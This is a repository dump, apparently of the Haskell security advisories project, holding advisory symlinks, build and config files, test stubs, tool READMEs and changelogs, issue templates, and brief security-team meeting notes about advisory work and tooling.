├── advisories ├── .gitkeep ├── reserved │ ├── 2024 │ │ ├── 0004.md │ │ ├── 0005.md │ │ ├── HSEC-2024-0004.md │ │ └── HSEC-2024-0005.md │ └── .gitkeep ├── ghc │ └── ghc │ │ ├── HSEC-2024-0007.md │ │ ├── HSEC-2024-0008.md │ │ └── HSEC-2025-0001.md ├── hackage │ ├── bz2 │ │ └── HSEC-2024-0002.md │ ├── aeson │ │ └── HSEC-2023-0001.md │ ├── base │ │ ├── HSEC-2023-0007.md │ │ └── HSEC-2024-0006.md │ ├── bzlib │ │ └── HSEC-2024-0002.md │ ├── crypton │ │ └── HSEC-2025-0002.md │ ├── keter │ │ └── HSEC-2024-0001.md │ ├── pandoc │ │ └── HSEC-2023-0014.md │ ├── process │ │ └── HSEC-2024-0003.md │ ├── xz-clib │ │ └── HSEC-2025-0003.md │ ├── bzlib-conduit │ │ └── HSEC-2024-0002.md │ ├── cabal-install │ │ ├── HSEC-2023-0015.md │ │ └── HSEC-2025-0005.md │ ├── cryptonite │ │ └── HSEC-2025-0002.md │ ├── git-annex │ │ ├── HSEC-2023-0009.md │ │ ├── HSEC-2023-0010.md │ │ ├── HSEC-2023-0011.md │ │ ├── HSEC-2023-0012.md │ │ └── HSEC-2023-0013.md │ ├── hledger-web │ │ └── HSEC-2023-0008.md │ ├── spacecookie │ │ └── HSEC-2025-0004.md │ ├── tls-extra │ │ └── HSEC-2023-0005.md │ ├── toml-reader │ │ └── HSEC-2023-0007.md │ ├── x509-store │ │ └── HSEC-2025-0006.md │ ├── xml-conduit │ │ └── HSEC-2023-0004.md │ ├── biscuit-haskell │ │ ├── HSEC-2023-0002.md │ │ └── HSEC-2024-0009.md │ ├── crypton-x509-store │ │ └── HSEC-2025-0006.md │ ├── x509-validation │ │ └── HSEC-2023-0006.md │ └── xmonad-contrib │ │ └── HSEC-2023-0003.md └── published │ ├── 2023 │ ├── HSEC-2023-0006.md │ ├── HSEC-2023-0003.md │ ├── HSEC-2023-0002.md │ ├── HSEC-2023-0001.md │ ├── HSEC-2023-0012.md │ ├── HSEC-2023-0004.md │ ├── HSEC-2023-0005.md │ ├── HSEC-2023-0014.md │ ├── HSEC-2023-0008.md │ ├── HSEC-2023-0009.md │ ├── HSEC-2023-0011.md │ ├── HSEC-2023-0007.md │ ├── HSEC-2023-0013.md │ ├── HSEC-2023-0010.md │ └── HSEC-2023-0015.md │ ├── 2024 │ ├── HSEC-2024-0008.md │ ├── HSEC-2024-0007.md │ ├── HSEC-2024-0001.md │ ├── HSEC-2024-0009.md │ ├── HSEC-2024-0006.md │ └── HSEC-2024-0002.md │ └── 2025 │ ├── HSEC-2025-0001.md │ ├── HSEC-2025-0006.md │ ├── HSEC-2025-0003.md │ ├── HSEC-2025-0004.md │ ├── HSEC-2025-0005.md │ └── HSEC-2025-0002.md ├── code ├── purl │ ├── CHANGELOG.md │ ├── README.md │ └── purl.cabal ├── README.md ├── hsec-sync │ ├── overview.png │ ├── recommended-workflow.png │ ├── CHANGELOG.md │ ├── test │ │ ├── Spec.hs │ │ └── Spec │ │ │ └── SyncSpec.hs │ ├── .gitignore │ ├── src │ │ └── Security │ │ │ └── Advisories │ │ │ ├── Sync │ │ │ └── Url.hs │ │ │ └── Sync.hs │ ├── README.md │ ├── hsec-sync.cabal │ └── app │ │ └── Main.hs ├── hsec-tools │ ├── test │ │ ├── golden │ │ │ ├── MISSING_TITLE.md.golden │ │ │ ├── MISSING_AFFECTED.md │ │ │ ├── MISSING_TITLE.md │ │ │ ├── MISSING_AFFECTED.md.golden │ │ │ ├── EXAMPLE_ADVISORY_GHC.md │ │ │ ├── EXAMPLE_ADVISORY_HACKAGE.md │ │ │ └── EXAMPLE_ADVISORY_REPO.md │ │ └── Spec.hs │ ├── assets │ │ ├── images │ │ │ └── hf-logo.png │ │ └── css │ │ │ └── default.css │ ├── src │ │ └── Security │ │ │ ├── Advisories.hs │ │ │ └── Advisories │ │ │ ├── Generate │ │ │ ├── TH.hs │ │ │ └── Snapshot.hs │ │ │ ├── Queries.hs │ │ │ └── Git.hs │ ├── app │ │ ├── Command │ │ │ ├── NextID.hs │ │ │ └── Reserve.hs │ │ └── Util.hs │ ├── README.md │ ├── .gitignore │ └── CHANGELOG.md ├── osv │ ├── test │ │ └── Spec.hs │ ├── README.md │ ├── CHANGELOG.md │ ├── .gitignore │ └── osv.cabal ├── cvss │ ├── README.md │ ├── CHANGELOG.md │ ├── cvss.cabal │ └── test │ │ └── Spec.hs ├── hsec-core │ ├── test │ │ └── Spec.hs │ ├── CHANGELOG.md │ ├── README.md │ ├── .gitignore │ ├── hsec-core.cabal │ └── src │ │ └── Security │ │ └── Advisories │ │ └── Core │ │ └── HsecId.hs └── LICENSE.txt ├── .gitignore ├── .envrc ├── .mailmap ├── shell.nix ├── cabal.project ├── .github ├── PULL_REQUEST_TEMPLATE.md ├── ISSUE_TEMPLATE │ ├── hsec-tools.md │ └── advisory.md └── haskell-ci.patch ├── meeting-notes ├── 2025-04-30.md ├── 2025-07-23.md ├── 2025-09-04.md ├── 2025-10-30.md ├── 2025-12-10.md ├── 2023-09-20.md ├── 2024-10-30.md ├── 2025-04-17.md ├── 2023-10-04.md ├── 2025-05-28.md ├── 2025-06-25.md ├── 2024-02-21.md ├── 2025-02-05.md ├── 2025-08-07.md ├── 2023-11-01.md ├── 2025-04-02.md ├── 2023-12-13.md ├── 2024-01-24.md ├── 2025-11-27.md ├── 2024-12-11.md ├── 2025-08-20.md ├── 2024-02-07.md ├── 2024-07-10.md ├── 2023-11-29.md ├── 2025-06-12.md ├── 2024-08-21.md ├── 2024-04-17.md ├── 2024-05-15.md ├── 2023-11-15.md ├── 2024-03-20.md ├── 2025-05-15.md ├── 2024-06-26.md ├── 2025-01-08.md ├── 2024-03-06.md ├── 2024-08-07.md ├── 2024-11-13.md ├── 2024-01-10.md ├── 2025-02-20.md ├── 2023-10-18.md ├── 2023-08-23.md ├── 2025-03-20.md ├── 2024-06-12.md ├── 2024-10-02.md ├── 2023-05-17.md ├── 2024-09-04.md ├── 2024-11-27.md ├── 2024-05-29.md ├── 2023-07-12.md ├── 2024-07-24.md ├── 2025-07-10.md ├── 2024-05-01.md ├── 2023-07-26.md ├── 2023-06-28.md ├── 2023-05-31.md ├── 2024-10-16.md ├── 2024-04-03.md ├── 2023-06-15.md └── 2023-08-09.md ├── docs ├── README.md ├── packages.md ├── reports.md ├── call-for-volunteers-example.md └── membership.md ├── LICENSE.txt ├── flake.lock ├── EXAMPLE_ADVISORY.md ├── CONTRIBUTING.md ├── flake.nix └── reports └── 2025-04-04-Q1-report.md /advisories/.gitkeep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /advisories/reserved/.gitkeep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /advisories/reserved/2024/0004.md: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /advisories/reserved/2024/0005.md: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /advisories/reserved/2024/HSEC-2024-0004.md: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /advisories/reserved/2024/HSEC-2024-0005.md: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /code/purl/CHANGELOG.md: -------------------------------------------------------------------------------- 1 | # 0.1.0.0 2 | 3 | Introduction 4 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | *~ 2 | dist-newstyle/ 3 | result 4 | .direnv 5 | .env 6 | -------------------------------------------------------------------------------- /.envrc: -------------------------------------------------------------------------------- 1 | use flake 2 | 3 | if [ -f .env ]; then 4 | . .env 5 | fi 6 | -------------------------------------------------------------------------------- /.mailmap: -------------------------------------------------------------------------------- 1 | Fraser Tweedale 2 | -------------------------------------------------------------------------------- /advisories/ghc/ghc/HSEC-2024-0007.md: -------------------------------------------------------------------------------- 1 | ../../published/2024/HSEC-2024-0007.md -------------------------------------------------------------------------------- /advisories/ghc/ghc/HSEC-2024-0008.md: -------------------------------------------------------------------------------- 1 | ../../published/2024/HSEC-2024-0008.md -------------------------------------------------------------------------------- /advisories/ghc/ghc/HSEC-2025-0001.md: -------------------------------------------------------------------------------- 1 | ../../published/2025/HSEC-2025-0001.md -------------------------------------------------------------------------------- /advisories/hackage/bz2/HSEC-2024-0002.md: -------------------------------------------------------------------------------- 1 | ../../published/2024/HSEC-2024-0002.md -------------------------------------------------------------------------------- /code/README.md: -------------------------------------------------------------------------------- 1 | This directory contains code for working with advisories. 2 | -------------------------------------------------------------------------------- /advisories/hackage/aeson/HSEC-2023-0001.md: -------------------------------------------------------------------------------- 1 | ../../published/2023/HSEC-2023-0001.md -------------------------------------------------------------------------------- /advisories/hackage/base/HSEC-2023-0007.md: -------------------------------------------------------------------------------- 1 | ../../published/2023/HSEC-2023-0007.md -------------------------------------------------------------------------------- /advisories/hackage/base/HSEC-2024-0006.md: -------------------------------------------------------------------------------- 1 | ../../published/2024/HSEC-2024-0006.md -------------------------------------------------------------------------------- /advisories/hackage/bzlib/HSEC-2024-0002.md: -------------------------------------------------------------------------------- 1 | ../../published/2024/HSEC-2024-0002.md -------------------------------------------------------------------------------- /advisories/hackage/crypton/HSEC-2025-0002.md: -------------------------------------------------------------------------------- 1 | ../../published/2025/HSEC-2025-0002.md -------------------------------------------------------------------------------- /advisories/hackage/keter/HSEC-2024-0001.md: -------------------------------------------------------------------------------- 1 | ../../published/2024/HSEC-2024-0001.md -------------------------------------------------------------------------------- /advisories/hackage/pandoc/HSEC-2023-0014.md: -------------------------------------------------------------------------------- 1 | ../../published/2023/HSEC-2023-0014.md -------------------------------------------------------------------------------- /advisories/hackage/process/HSEC-2024-0003.md: -------------------------------------------------------------------------------- 1 | ../../published/2024/HSEC-2024-0003.md -------------------------------------------------------------------------------- /advisories/hackage/xz-clib/HSEC-2025-0003.md: -------------------------------------------------------------------------------- 1 | ../../published/2025/HSEC-2025-0003.md -------------------------------------------------------------------------------- /advisories/hackage/bzlib-conduit/HSEC-2024-0002.md: -------------------------------------------------------------------------------- 1 | ../../published/2024/HSEC-2024-0002.md -------------------------------------------------------------------------------- /advisories/hackage/cabal-install/HSEC-2023-0015.md: -------------------------------------------------------------------------------- 1 | ../../published/2023/HSEC-2023-0015.md -------------------------------------------------------------------------------- /advisories/hackage/cabal-install/HSEC-2025-0005.md: -------------------------------------------------------------------------------- 1 | ../../published/2025/HSEC-2025-0005.md -------------------------------------------------------------------------------- /advisories/hackage/cryptonite/HSEC-2025-0002.md: -------------------------------------------------------------------------------- 1 | ../../published/2025/HSEC-2025-0002.md -------------------------------------------------------------------------------- /advisories/hackage/git-annex/HSEC-2023-0009.md: -------------------------------------------------------------------------------- 1 | ../../published/2023/HSEC-2023-0009.md -------------------------------------------------------------------------------- /advisories/hackage/git-annex/HSEC-2023-0010.md: -------------------------------------------------------------------------------- 1 | ../../published/2023/HSEC-2023-0010.md -------------------------------------------------------------------------------- /advisories/hackage/git-annex/HSEC-2023-0011.md: -------------------------------------------------------------------------------- 1 | ../../published/2023/HSEC-2023-0011.md -------------------------------------------------------------------------------- /advisories/hackage/git-annex/HSEC-2023-0012.md: -------------------------------------------------------------------------------- 1 | ../../published/2023/HSEC-2023-0012.md -------------------------------------------------------------------------------- /advisories/hackage/git-annex/HSEC-2023-0013.md: -------------------------------------------------------------------------------- 1 | ../../published/2023/HSEC-2023-0013.md -------------------------------------------------------------------------------- /advisories/hackage/hledger-web/HSEC-2023-0008.md: -------------------------------------------------------------------------------- 1 | ../../published/2023/HSEC-2023-0008.md -------------------------------------------------------------------------------- /advisories/hackage/spacecookie/HSEC-2025-0004.md: -------------------------------------------------------------------------------- 1 | ../../published/2025/HSEC-2025-0004.md -------------------------------------------------------------------------------- /advisories/hackage/tls-extra/HSEC-2023-0005.md: -------------------------------------------------------------------------------- 1 | ../../published/2023/HSEC-2023-0005.md -------------------------------------------------------------------------------- /advisories/hackage/toml-reader/HSEC-2023-0007.md: -------------------------------------------------------------------------------- 1 | ../../published/2023/HSEC-2023-0007.md -------------------------------------------------------------------------------- /advisories/hackage/x509-store/HSEC-2025-0006.md: -------------------------------------------------------------------------------- 1 | ../../published/2025/HSEC-2025-0006.md -------------------------------------------------------------------------------- /advisories/hackage/xml-conduit/HSEC-2023-0004.md: -------------------------------------------------------------------------------- 1 | ../../published/2023/HSEC-2023-0004.md -------------------------------------------------------------------------------- /advisories/hackage/biscuit-haskell/HSEC-2023-0002.md: -------------------------------------------------------------------------------- 1 | ../../published/2023/HSEC-2023-0002.md -------------------------------------------------------------------------------- /advisories/hackage/biscuit-haskell/HSEC-2024-0009.md: -------------------------------------------------------------------------------- 1 | ../../published/2024/HSEC-2024-0009.md -------------------------------------------------------------------------------- /advisories/hackage/crypton-x509-store/HSEC-2025-0006.md: -------------------------------------------------------------------------------- 1 | ../../published/2025/HSEC-2025-0006.md -------------------------------------------------------------------------------- /advisories/hackage/x509-validation/HSEC-2023-0006.md: -------------------------------------------------------------------------------- 1 | ../../published/2023/HSEC-2023-0006.md -------------------------------------------------------------------------------- /advisories/hackage/xmonad-contrib/HSEC-2023-0003.md: -------------------------------------------------------------------------------- 1 | ../../published/2023/HSEC-2023-0003.md -------------------------------------------------------------------------------- /shell.nix: -------------------------------------------------------------------------------- 1 | (builtins.getFlake ("git+file://" + toString ./.)).devShell.${builtins.currentSystem} 2 | -------------------------------------------------------------------------------- /code/hsec-sync/overview.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/haskell/security-advisories/HEAD/code/hsec-sync/overview.png -------------------------------------------------------------------------------- /code/hsec-tools/test/golden/MISSING_TITLE.md.golden: -------------------------------------------------------------------------------- 1 | Left 2 | ( MarkdownFormatError "Does not have summary heading" ) 3 | 4 | -------------------------------------------------------------------------------- /code/hsec-sync/recommended-workflow.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/haskell/security-advisories/HEAD/code/hsec-sync/recommended-workflow.png -------------------------------------------------------------------------------- /code/hsec-tools/test/golden/MISSING_AFFECTED.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | [advisory] 3 | id = "HSEC-0000-0000" 4 | cwe = [] 5 | ``` 6 | 7 | ## Title 8 | -------------------------------------------------------------------------------- /code/hsec-tools/test/golden/MISSING_TITLE.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | [advisory] 3 | id = "HSEC-0000-0000" 4 | cwe = [] 5 | date = 1970-01-01 6 | ``` 7 | -------------------------------------------------------------------------------- /code/hsec-tools/assets/images/hf-logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/haskell/security-advisories/HEAD/code/hsec-tools/assets/images/hf-logo.png -------------------------------------------------------------------------------- /cabal.project: -------------------------------------------------------------------------------- 1 | packages: code/*/*.cabal 2 | 3 | package hsec-core 4 | package hsec-tools 5 | package hsec-sync 6 | package cvss 7 | package osv 8 | package purl 9 | 10 | test-show-details: direct 11 | -------------------------------------------------------------------------------- /code/hsec-sync/CHANGELOG.md: -------------------------------------------------------------------------------- 1 | ## 0.2.0.2 2 | 3 | * Update `tasty` dependency bounds 4 | 5 | ## 0.2.0.0 6 | 7 | * Rewrite, using `hsec-tools` snapshots 8 | 9 | ## 0.1.0.0 10 | 11 | * Introduction, `git`-based 12 | -------------------------------------------------------------------------------- /code/osv/test/Spec.hs: -------------------------------------------------------------------------------- 1 | {-# LANGUAGE OverloadedStrings #-} 2 | 3 | module Main where 4 | 5 | import Test.Tasty 6 | 7 | main :: IO () 8 | main = 9 | defaultMain $ 10 | testGroup "Tests" 11 | [] 12 | -------------------------------------------------------------------------------- /code/cvss/README.md: -------------------------------------------------------------------------------- 1 | # cvss 2 | 3 | This project aims to support [Common Vulnerability Scoring System](https://www.first.org/cvss/). 4 | 5 | ## Building 6 | 7 | We aim to support both regular cabal-based and nix-based builds. 8 | -------------------------------------------------------------------------------- /code/osv/README.md: -------------------------------------------------------------------------------- 1 | # osv 2 | 3 | This project aims to support [Open Source Vulnerability format](https://ossf.github.io/osv-schema/). 4 | 5 | ## Building 6 | 7 | We aim to support both regular cabal-based and nix-based builds. 8 | -------------------------------------------------------------------------------- /code/purl/README.md: -------------------------------------------------------------------------------- 1 | # purl 2 | 3 | This project aims to support [purl (universal package URL)](https://github.com/package-url/purl-spec). 4 | 5 | ## Building 6 | 7 | We aim to support both regular cabal-based and nix-based builds. 8 | -------------------------------------------------------------------------------- /.github/PULL_REQUEST_TEMPLATE.md: -------------------------------------------------------------------------------- 1 | 2 | --- 3 | 4 | ## Advisory 5 | 6 | - [ ] It's not duplicated 7 | - [ ] All fields are filled 8 | - [ ] It is validated by `hsec-tools` 9 | 10 | ## hsec-tools 11 | 12 | - [ ] Previous advisories are still valid 13 | -------------------------------------------------------------------------------- /code/cvss/CHANGELOG.md: -------------------------------------------------------------------------------- 1 | ## 0.2.0.1 2 | 3 | * Update `tasty` dependency bounds 4 | 5 | ## 0.2 6 | 7 | * Changed the CVSS v2 parser and printer to omit the "CVSS:2.0/" version prefix according to the spec. 8 | 9 | ## 0.1 10 | 11 | * Introduction 12 | -------------------------------------------------------------------------------- /code/hsec-core/test/Spec.hs: -------------------------------------------------------------------------------- 1 | module Main where 2 | 3 | import Test.Tasty 4 | import qualified Spec.QueriesSpec as QueriesSpec 5 | 6 | main :: IO () 7 | main = 8 | defaultMain $ 9 | testGroup 10 | "Tests" 11 | [QueriesSpec.spec] 12 | -------------------------------------------------------------------------------- /meeting-notes/2025-04-30.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2025-04-30 2 | 3 | Previously: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2025-04-17.md 5 | 6 | 7 | ## ZuriHac + Ecosystem Workshop 8 | 9 | - Gautier confirmed. 10 | - Fraser cannot come. 11 | -------------------------------------------------------------------------------- /meeting-notes/2025-07-23.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2025-07-23 2 | 3 | Previously: https://github.com/haskell/security-advisories/blob/main/meeting-notes/2025-07-10.md 4 | 5 | ## Package release 6 | 7 | * Gautier bump all packages version 8 | * Waiting for Fraser to add other HSRT to the maintainers list 9 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/hsec-tools.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: hsec-tools related 3 | about: Bug or suggestion about hsec-tools 4 | title: '' 5 | labels: hsec-tools 6 | assignees: '' 7 | 8 | --- 9 | 10 | ## Summary 11 | 12 | ## Steps to reproduce 13 | 14 | ## Expected behavior 15 | 16 | ## Cause of the bug 17 | -------------------------------------------------------------------------------- /code/hsec-sync/test/Spec.hs: -------------------------------------------------------------------------------- 1 | {-# LANGUAGE OverloadedStrings #-} 2 | 3 | module Main where 4 | 5 | import Test.Tasty 6 | 7 | import qualified Spec.SyncSpec as SyncSpec 8 | 9 | main :: IO () 10 | main = do 11 | defaultMain $ 12 | testGroup "Tests" 13 | [ SyncSpec.spec 14 | ] 15 | -------------------------------------------------------------------------------- /code/osv/CHANGELOG.md: -------------------------------------------------------------------------------- 1 | # 0.2.0.0 2 | 3 | * Rely on `purl` for `Security.OSV.Package.packageUrl` 4 | * Update `tasty` dependency bounds 5 | 6 | # 0.1.0.2 7 | 8 | * Update dependencies bounds 9 | 10 | # 0.1.0.1 11 | 12 | * Fix `cvss` dependency bounds 13 | 14 | # 0.1.0.0 15 | 16 | * Introduction 17 | -------------------------------------------------------------------------------- /code/hsec-tools/src/Security/Advisories.hs: -------------------------------------------------------------------------------- 1 | module Security.Advisories 2 | ( module Security.Advisories.Core.Advisory 3 | , module Security.Advisories.Core.HsecId 4 | , module Security.Advisories.Parse 5 | ) 6 | where 7 | 8 | import Security.Advisories.Core.Advisory 9 | import Security.Advisories.Core.HsecId 10 | import Security.Advisories.Parse 11 | -------------------------------------------------------------------------------- /meeting-notes/2025-09-04.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2025-09-04 2 | 3 | Previously: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2025-08-20.md 5 | 6 | ## Status on embargoed advisory 7 | (redacted) 8 | 9 | ## Security "prospectus" 10 | 11 | Fraser wrote the initial draft of a prospectus for funding Haskell ecosystem security work. 12 | -------------------------------------------------------------------------------- /meeting-notes/2025-10-30.md: -------------------------------------------------------------------------------- 1 | 2 | Previously: 3 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2025-09-04.md 4 | 5 | ## Status on embargoed advisory 6 | (redacted) 7 | 8 | ## Re-layout 9 | 10 | Tristan and Gautier fixed linked in the [re-layout PR](https://github.com/haskell/security-advisories/pull/293), making it ready to merge. 11 | -------------------------------------------------------------------------------- /code/hsec-core/CHANGELOG.md: -------------------------------------------------------------------------------- 1 | ## 0.3.0.0 2 | 3 | * Add `Repository` and `ComponentIdentifier` in `Security.Advisories.Core.Advisory` 4 | 5 | ## 0.2.1.0 6 | 7 | * Introduce `isVersionAffectedBy` and `isVersionRangeAffectedBy` in `Security.Advisories.Core` 8 | 9 | ## 0.2.0.2 10 | 11 | * Update `osv` dependency bounds 12 | * Update `tasty` dependency bounds 13 | 14 | -------------------------------------------------------------------------------- /meeting-notes/2025-12-10.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2025-12-10 2 | 3 | Previously: https://github.com/haskell/security-advisories/blob/main/meeting-notes/2025-11-27.md 4 | 5 | ## Status on embargoed advisory 6 | (redacted) 7 | 8 | ## Other works 9 | 10 | Gautier started to add [add support for other namespaces (#240)](https://github.com/haskell/security-advisories/pull/306). 11 | -------------------------------------------------------------------------------- /code/hsec-tools/app/Command/NextID.hs: -------------------------------------------------------------------------------- 1 | module Command.NextID where 2 | 3 | import Security.Advisories.Core.HsecId (printHsecId, getNextHsecId) 4 | import Security.Advisories.Filesystem (getGreatestId) 5 | 6 | import Util (ensureRepo) 7 | 8 | runNextIDCommand :: Maybe FilePath -> IO () 9 | runNextIDCommand mPath = 10 | ensureRepo mPath >>= getGreatestId >>= getNextHsecId >>= putStrLn . printHsecId 11 | -------------------------------------------------------------------------------- /code/hsec-core/README.md: -------------------------------------------------------------------------------- 1 | # hsec-core 2 | 3 | `hesc-core` aims to support [Haskell advisories database](https://github.com/haskell/security-advisories). 4 | 5 | ## Building 6 | 7 | We aim to support both regular cabal-based and nix-based builds. 8 | 9 | ## Testing 10 | 11 | Run (and auto update) the golden test: 12 | 13 | ```ShellSession 14 | cabal test -O0 --test-show-details=direct --test-option=--accept 15 | ``` 16 | -------------------------------------------------------------------------------- /code/hsec-tools/README.md: -------------------------------------------------------------------------------- 1 | # hsec-tools 2 | 3 | `hsec-tools` aims to support [Haskell advisories database](https://github.com/haskell/security-advisories). 4 | 5 | ## Building 6 | 7 | We aim to support both regular cabal-based and nix-based builds. 8 | 9 | ## Testing 10 | 11 | Run (and auto update) the golden test: 12 | 13 | ```ShellSession 14 | cabal test -O0 --test-show-details=direct --test-option=--accept 15 | ``` 16 | -------------------------------------------------------------------------------- /code/osv/.gitignore: -------------------------------------------------------------------------------- 1 | ##### Haskell 2 | dist 3 | dist-* 4 | cabal-dev 5 | *.o 6 | *.hi 7 | *.hie 8 | *.chi 9 | *.chs.h 10 | *.dyn_o 11 | *.dyn_hi 12 | .hpc 13 | .hsenv 14 | .cabal-sandbox/ 15 | cabal.sandbox.config 16 | *.prof 17 | *.aux 18 | *.hp 19 | *.eventlog 20 | .stack-work/ 21 | cabal.project.local 22 | cabal.project.local~ 23 | .HTF/ 24 | .ghc.environment.* 25 | build 26 | bin-* 27 | 28 | result 29 | .direnv 30 | .env 31 | -------------------------------------------------------------------------------- /code/hsec-core/.gitignore: -------------------------------------------------------------------------------- 1 | ##### Haskell 2 | dist 3 | dist-* 4 | cabal-dev 5 | *.o 6 | *.hi 7 | *.hie 8 | *.chi 9 | *.chs.h 10 | *.dyn_o 11 | *.dyn_hi 12 | .hpc 13 | .hsenv 14 | .cabal-sandbox/ 15 | cabal.sandbox.config 16 | *.prof 17 | *.aux 18 | *.hp 19 | *.eventlog 20 | .stack-work/ 21 | cabal.project.local 22 | cabal.project.local~ 23 | .HTF/ 24 | .ghc.environment.* 25 | build 26 | bin-* 27 | 28 | result 29 | .direnv 30 | .env 31 | -------------------------------------------------------------------------------- /code/hsec-sync/.gitignore: -------------------------------------------------------------------------------- 1 | ##### Haskell 2 | dist 3 | dist-* 4 | cabal-dev 5 | *.o 6 | *.hi 7 | *.hie 8 | *.chi 9 | *.chs.h 10 | *.dyn_o 11 | *.dyn_hi 12 | .hpc 13 | .hsenv 14 | .cabal-sandbox/ 15 | cabal.sandbox.config 16 | *.prof 17 | *.aux 18 | *.hp 19 | *.eventlog 20 | .stack-work/ 21 | cabal.project.local 22 | cabal.project.local~ 23 | .HTF/ 24 | .ghc.environment.* 25 | build 26 | bin-* 27 | 28 | result 29 | .direnv 30 | .env 31 | -------------------------------------------------------------------------------- /meeting-notes/2023-09-20.md: -------------------------------------------------------------------------------- 1 | - SRT 2023/09/20 2 | 3 | # Present 4 | - Gautier 5 | - Mihai 6 | - David 7 | - Casey 8 | 9 | # hsec-tools 10 | - casey: need to rebase changes in regarding purl spec code and sync up with Frasier about his comments about the specification. 11 | - mihai: embargo status and still working on GHCup review 12 | 13 | # security scanner 14 | - david: had a conversation about the need for a security scanner. 15 | -------------------------------------------------------------------------------- /meeting-notes/2024-10-30.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2024-10-30 2 | 3 | Previously: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2024-10-16.md 5 | 6 | ## Call for Volunteers 7 | 8 | We received the candidatures and voted for the new members to be announced. 9 | 10 | ## GHC Math bugs 11 | 12 | The advisories are updated and available for review: [#214](https://github.com/haskell/security-advisories/pull/214) 13 | -------------------------------------------------------------------------------- /code/hsec-tools/.gitignore: -------------------------------------------------------------------------------- 1 | ##### Haskell 2 | dist 3 | dist-* 4 | cabal-dev 5 | *.o 6 | *.hi 7 | *.hie 8 | *.chi 9 | *.chs.h 10 | *.dyn_o 11 | *.dyn_hi 12 | .hpc 13 | .hsenv 14 | .cabal-sandbox/ 15 | cabal.sandbox.config 16 | *.prof 17 | *.aux 18 | *.hp 19 | *.eventlog 20 | .stack-work/ 21 | cabal.project.local 22 | cabal.project.local~ 23 | .HTF/ 24 | .ghc.environment.* 25 | build 26 | bin-* 27 | 28 | result 29 | .direnv 30 | .env 31 | -------------------------------------------------------------------------------- /meeting-notes/2025-04-17.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2025-04-17 2 | 3 | Present: Gautier, Montez 4 | 5 | Previously: 6 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2025-04-02.md 7 | 8 | ## Embargoed ``hackage-server`` 9 | 10 | - Some mitigations have already been pushed 11 | - Fraser drives the next fixes 12 | 13 | ## HSEC-2025-0003: Use after free in multithreaded lzma (.xz) decoder 14 | 15 | - Published and fixed 16 | -------------------------------------------------------------------------------- /meeting-notes/2023-10-04.md: -------------------------------------------------------------------------------- 1 | - SRT 2023/10/04 2 | 3 | # Present 4 | - Gautier 5 | - Tristan 6 | 7 | # Pull-Requests 8 | - Gautier: many PRs are stalling, while being approved 9 | - Gautier: rebase PRs and merge them if there are enough approval 10 | 11 | # Embargo update 12 | - Tristan: still waiting for upstream release, should we make the advisory public? 13 | 14 | # Action items 15 | - Let's merge the open PR unless there is an objections 16 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/advisory.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: advisory 3 | about: declare a (potential) vulnerability 4 | title: '' 5 | labels: advisory 6 | assignees: '' 7 | 8 | --- 9 | 10 | Mandatory information: 11 | 12 | * Package : `?` 13 | * cvss: `?` 14 | * affected versions: `?` 15 | 16 | Optional: 17 | 18 | * cve: `?` 19 | * keywords: `?` 20 | * aliases: `?` 21 | * related: `?` 22 | * affected OSes: `?` 23 | * affected architecture: `?` 24 | * declarations: `?` 25 | * Long description: `?` 26 | -------------------------------------------------------------------------------- /docs/README.md: -------------------------------------------------------------------------------- 1 | # Haskell Security Response Team documentation 2 | 3 | The files in this directory document the functional and 4 | administrative processes of the Haskell Security Response Team. 5 | 6 | - [SRT membership processes](./membership.md) 7 | - [Quarterly reports](./reports.md) 8 | - [SRT-owned Hackage packages and maintainership policies](./packages.md) 9 | 10 | Documentation for our tools, libraries and the advisory source 11 | format live in the `code/` directory of the main repo. 12 | -------------------------------------------------------------------------------- /meeting-notes/2025-05-28.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2025-05-28 2 | 3 | Previously: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2025-05-15.md 5 | 6 | ## haskell.org listing vulnerability report 7 | 8 | * We received a vulnerability report on 2025-05-27 9 | * We are able to list directories when there is no `index.html`, which is an Apache misconfiguration 10 | * Since all the assets are on GitHub, it is not a problem 11 | 12 | ## ZuriHac 13 | 14 | * Gautier, Jose, and Tristan will attend 15 | -------------------------------------------------------------------------------- /meeting-notes/2025-06-25.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2025-06-25 2 | 3 | Attended: Gautier, Jose, Montez 4 | 5 | Previously: 6 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2025-06-12.md 7 | 8 | ## Vulnerabilities 9 | 10 | - No new vulnerabilities 11 | - Gautier will ping @dcouts on [cabal dependency confusion advisory](https://github.com/haskell/security-advisories/pull/281) 12 | 13 | ## Pending work 14 | 15 | - Gautier looks for feedback on [purl](https://github.com/haskell/security-advisories/pull/282) 16 | -------------------------------------------------------------------------------- /code/hsec-tools/test/golden/MISSING_AFFECTED.md.golden: -------------------------------------------------------------------------------- 1 | Left 2 | ( AdvisoryError 3 | [ MatchMessage 4 | { matchAnn = Just 5 | ( Position 6 | { posIndex = 0 7 | , posLine = 1 